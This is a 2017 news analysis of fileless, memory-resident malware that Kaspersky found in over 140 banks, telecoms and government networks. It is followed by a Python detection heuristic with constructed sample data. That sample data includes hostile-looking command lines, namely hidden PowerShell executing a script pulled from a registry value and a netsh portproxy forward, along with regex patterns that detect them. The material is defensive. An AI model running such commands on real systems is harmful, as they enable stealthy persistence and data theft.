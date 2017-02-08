News Analysis

'Invisible' memory-based malware hit over 140 banks, telecoms and government agencies

Anti-forensic techniques, such as the malware vanishing after a reboot, make attribution nearly impossible.

Computerworld


Cybercriminals have hit more than 40 countries with hidden malware that steals passwords and financial data. The malware is not found on hard drives as it hides in the memory of compromised computers, making it almost “invisible” as criminals exfiltrate system administrators’ credentials and other sensitive data. When a targeted machine is rebooted, nearly all traces of the malware disappear.

Over 140 enterprise networks – banks, government organizations and telecommunication companies – from 40 countries have been hit, according to Kaspersky Lab. The cybercriminals are using methods and sophisticated malware previously used by nation-state attackers.

The U.S. has been the most targeted country with 21 hidden-malware attacks, followed by 10 attacks in France, nine in Ecuador, eight in Kenya, and seven in both the UK and Russia.

Image: fileless malware hit over 140 enterprises in 40 countries (Kaspersky Lab)

Because the malware hides so well, and disappears after a reboot, the true number of infections may be much higher.

The “attacks are ongoing globally against banks themselves,” Kaspersky Lab’s Kurt Baumgartner told Ars Technica. “The banks have not been adequately prepared in many cases to deal with this.” The attackers are “targeting computers that run automatic teller machines” in order to push “money out of the banks from within the banks.”

The attackers have embraced anti-forensic techniques to avoid detection; malware loaded into RAM instead of written to a hard drive helps keep it undetected while data is being stolen and systems are being remotely controlled. The attackers have used expired domains that have no WHOIS information. By using open source and legitimate tools, the cybercriminals are making attribution nearly impossible.

Image: invisible malware discovered by Kaspersky Lab (Kaspersky Lab)

Researchers from Kaspersky Lab first learned of the “fileless” malware when a bank was attacked and the firm helped with the forensic analysis. The bank found Meterpreter code in the memory of a server; Meterpreter was not supposed to be in the physical memory of the domain controller. Digging deeper, the researchers learned that the code had been injected into memory using PowerShell commands. The PowerShell scripts were hidden within the Windows registry.

The attackers used Mimikatz, Kaspersky Lab said, to grab credentials from accounts with administrative privileges and NETSH to send stolen data back to their server.

It is presently unclear if the attacker is one group or if several groups are using the same tools. “Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible,” wrote Kaspersky Lab. However, the researchers noted that similar techniques have been used by the groups GCMAN and Carbanak.

Kaspersky Lab will reveal more details about the attack, as well as how the cybercriminals withdrew money from ATMs, at its Security Analyst Summit in April.

For now, Kaspersky has listed indicators of compromise; “detection of this attack would be possible in RAM, network and registry only.” After an infected machine is cleaned, all passwords must be changed. “This attack shows how no malware samples are needed for successful exfiltration of a network and how standard and open source utilities make attribution almost impossible.”
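The article says the remaining traces of this attack sit in RAM, the network and the registry. As an added illustration (not Kaspersky's indicators or tooling), the following Python heuristic scans constructed autorun registry values and process command lines for the two host-side patterns the article describes: PowerShell pulling a script body out of a registry value and executing it, and netsh being used to move data; the registry paths, value names and the portproxy sub-command are assumptions for the sample data, not details from the report.

```python
import re

# Constructed sample telemetry, not data from the article: autorun registry values and
# process command lines, two of the three places the article says traces remain.
REGISTRY_AUTORUNS = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r'powershell.exe -w hidden -nop -c "IEX (Get-ItemProperty HKLM:\Software\ConstructedVendor -Name Data).Data"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Sync",
     "powershell.exe -WindowStyle Hidden -EncodedCommand QUJDRA=="),
]
PROCESS_EVENTS = [  # (pid, command line)
    (412, r'"C:\Windows\explorer.exe"'),
    (1337, 'powershell.exe -NoProfile -WindowStyle Hidden -Command "IEX ([Text.Encoding]::Unicode'
           r'.GetString([Convert]::FromBase64String((Get-ItemProperty HKLM:\Software\ConstructedVendor -Name Blob).Blob)))"'),
    (2048, "netsh interface portproxy add v4tov4 listenport=4444 connectaddress=192.0.2.10 connectport=443"),
    (3001, r'powershell.exe -Command "Get-ItemProperty HKLM:\Software\Microsoft\Windows NT\CurrentVersion | Select ProductName"'),
]

POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# A registry read feeding Invoke-Expression: the script body lives in a value, not in a file.
REG_TO_EXEC_RE = re.compile(
    r"Get-ItemProperty.*\b(?:IEX|Invoke-Expression)\b|\b(?:IEX|Invoke-Expression)\b.*Get-ItemProperty", re.I)
# Flags that hide the window, skip profiles or take a base64 command instead of a script file.
STEALTH_FLAGS_RE = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|e(?:nc(?:odedcommand)?)?\b)", re.I)
# The article only says netsh carried stolen data out; portproxy is the assumed sub-command to watch.
NETSH_PROXY_RE = re.compile(r"\bnetsh(?:\.exe)?\b.*\bportproxy\b", re.I)


def scan_autoruns(entries):
    """Return (source, rule, evidence) for autorun values that launch PowerShell suspiciously."""
    findings = []
    for key, name, data in entries:
        if POWERSHELL_RE.search(data) and REG_TO_EXEC_RE.search(data):
            findings.append(("registry", "autorun_powershell_exec_from_registry", f"{key}\\{name}"))
        elif POWERSHELL_RE.search(data) and STEALTH_FLAGS_RE.search(data):
            findings.append(("registry", "autorun_hidden_powershell", f"{key}\\{name}"))
    return findings

def scan_processes(events):
    """Return findings for command lines that pull code out of the registry or set up netsh proxies."""
    findings = []
    for pid, cmdline in events:
        if POWERSHELL_RE.search(cmdline) and REG_TO_EXEC_RE.search(cmdline):
            findings.append(("process", "powershell_exec_from_registry", f"pid {pid}"))
        if NETSH_PROXY_RE.search(cmdline):
            findings.append(("process", "netsh_portproxy", f"pid {pid}"))
    return findings
```

The legitimate `Get-ItemProperty` read of the Windows version (pid 3001) is not flagged because nothing is passed to `IEX`; the heuristic keys on the read-then-execute combination rather than on registry access alone.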

Darlene Storm (not her real name) is a freelance writer with a background in information technology and information security.
